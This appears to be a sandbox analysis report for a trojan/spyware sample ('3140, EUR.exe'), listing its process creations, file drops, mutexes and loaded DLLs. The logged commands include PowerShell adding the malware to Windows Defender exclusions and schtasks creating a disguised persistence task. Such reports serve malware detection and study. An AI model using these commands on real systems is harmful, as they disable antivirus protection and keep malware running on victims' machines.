Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.SetAccessControl
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.AddAccessRule
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, onTDHLANSwQB4GuLwN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.SetAccessControl
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.AddAccessRule
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, onTDHLANSwQB4GuLwN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3140, EUR.exe, 00000000.00000002.1725784467.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OobeEnableRtpAndSigUpdates;.VBP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/15@4/4
Source: C:\Users\user\Desktop\3140, EUR.exe File created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_03
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Users\user\Desktop\3140, EUR.exe File created: C:\Users\user\AppData\Local\Temp\tmpE737.tmp Jump to behavior
Source: 3140, EUR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 3140, EUR.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\3140, EUR.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 3140, EUR.exe ReversingLabs: Detection: 47%
Source: 3140, EUR.exe Virustotal: Detection: 43%
Source: C:\Users\user\Desktop\3140, EUR.exe File read: C:\Users\user\Desktop\3140, EUR.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe" Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp" Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: msvcp140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rsaenh.dll
